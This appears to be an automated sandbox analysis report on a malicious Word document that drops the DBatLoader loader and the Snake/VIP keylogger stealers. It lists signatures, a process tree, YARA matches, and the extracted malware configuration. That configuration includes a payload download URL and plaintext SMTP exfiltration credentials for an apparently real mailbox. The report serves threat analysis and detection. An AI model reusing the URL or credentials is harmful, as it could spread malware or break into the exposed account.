Edit tour

Windows Analysis Report
PI ITS15235 (2).doc

Overview

General Information

Sample name:	PI ITS15235 (2).doc
Analysis ID:	1592497
MD5:	059f7753a76e86c8ed56f480041d631f
SHA1:	c356187bee23b8930e82ba2cea112873b39567d4
SHA256:	ce3681ec2e62af9f0231b1a32a7319766d8193d0ff86c69691176f4cd404f129
Tags:	docuser-abuse_ch
Infos:

Detection

DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document exploit detected (process start blacklist hit)

Drops PE files with a suspicious file extension

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Office process drops PE file

Office process queries suspicious COM object (likely to drop second stage)

PE file contains section with special chars

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 1812 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

brightness.exe (PID: 7368 cmdline: C:\Windows\SysWOW64\brightness.exe MD5: AEA0BCDBDDBEABFDE26F53671890D1B7)

cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7640 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

npratlsN.pif (PID: 7716 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Nsltarpn.PIF (PID: 7960 cmdline: "C:\Users\Public\Libraries\Nsltarpn.PIF" MD5: AEA0BCDBDDBEABFDE26F53671890D1B7)

npratlsN.pif (PID: 8008 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Nsltarpn.PIF (PID: 8140 cmdline: "C:\Users\Public\Libraries\Nsltarpn.PIF" MD5: AEA0BCDBDDBEABFDE26F53671890D1B7)

npratlsN.pif (PID: 8188 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://amazonenviro.com/admin/245_Nsltarpncon"]}

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.3820648625.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000011.00000002.3820791645.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7ffdf:$a1: get_encryptedPassword 0x7ffb3:$a2: get_encryptedUsername 0x80077:$a3: get_timePasswordChanged 0x7ff8f:$a4: get_passwordField 0x7fff5:$a5: set_encryptedPassword 0x7fdc2:$a7: get_logins 0x7b43d:$a10: KeyLoggerEventArgs 0x7b40c:$a11: KeyLoggerEventArgsEventHandler 0x7fe96:$a13: _encryptedPassword
00000011.00000002.3850452895.0000000028401000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000011.00000002.3850452895.000000002853D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
0000000D.00000002.3861659877.000000001F7F0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ae59:$a1: get_encryptedPassword 0x3ae2d:$a2: get_encryptedUsername 0x3aef1:$a3: get_timePasswordChanged 0x3ae09:$a4: get_passwordField 0x3ae6f:$a5: set_encryptedPassword 0x3ac3c:$a7: get_logins 0x362b7:$a10: KeyLoggerEventArgs 0x36286:$a11: KeyLoggerEventArgsEventHandler 0x3ad10:$a13: _encryptedPassword
0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3852283482.000000001CC41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.3853601584.000000002D9F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000011.00000002.3855219862.00000000294A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.3855219862.00000000294A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000001.2243005056.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e6f1:$a1: get_encryptedPassword 0x3e6c5:$a2: get_encryptedUsername 0x3e789:$a3: get_timePasswordChanged 0x3e6a1:$a4: get_passwordField 0x3e707:$a5: set_encryptedPassword 0x3e4d4:$a7: get_logins 0x39b4f:$a10: KeyLoggerEventArgs 0x39b1e:$a11: KeyLoggerEventArgsEventHandler 0x3e5a8:$a13: _encryptedPassword
00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49820:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48ec3:$a3: \Google\Chrome\User Data\Default\Login Data 0x49120:$a4: \Orbitum\User Data\Default\Login Data 0x49aff:$a5: \Kometa\User Data\Default\Login Data
00000011.00000002.3861807500.000000002B0C0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c2a4:$s1: UnHook 0x3c240:$s2: SetHook 0x3c279:$s3: CallNextHook 0x3c208:$s4: _hook
0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7ffdf:$a1: get_encryptedPassword 0x7ffb3:$a2: get_encryptedUsername 0x80077:$a3: get_timePasswordChanged 0x7ff8f:$a4: get_passwordField 0x7fff5:$a5: set_encryptedPassword 0x7fdc2:$a7: get_logins 0x7b43d:$a10: KeyLoggerEventArgs 0x7b40c:$a11: KeyLoggerEventArgsEventHandler 0x7fe96:$a13: _encryptedPassword
0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f5d9:$a1: get_encryptedPassword 0x3f5ad:$a2: get_encryptedUsername 0x3f671:$a3: get_timePasswordChanged 0x3f589:$a4: get_passwordField 0x3f5ef:$a5: set_encryptedPassword 0x3f3bc:$a7: get_logins 0x3aa37:$a10: KeyLoggerEventArgs 0x3aa06:$a11: KeyLoggerEventArgsEventHandler 0x3f490:$a13: _encryptedPassword
0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a708:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49dab:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a008:$a4: \Orbitum\User Data\Default\Login Data 0x4a9e7:$a5: \Kometa\User Data\Default\Login Data
0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d18c:$s1: UnHook 0x3d128:$s2: SetHook 0x3d161:$s3: CallNextHook 0x3d0f0:$s4: _hook
0000000D.00000002.3856159190.000000001DC16000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3856159190.000000001DC16000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.3852283482.000000001CC7A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f209:$a1: get_encryptedPassword 0x3f1dd:$a2: get_encryptedUsername 0x3f2a1:$a3: get_timePasswordChanged 0x3f1b9:$a4: get_passwordField 0x3f21f:$a5: set_encryptedPassword 0x3efec:$a7: get_logins 0x3a667:$a10: KeyLoggerEventArgs 0x3a636:$a11: KeyLoggerEventArgsEventHandler 0x3f0c0:$a13: _encryptedPassword
00000011.00000001.2446904495.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 E9 88 44 24 2B 88 44 24 2F B0 10 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
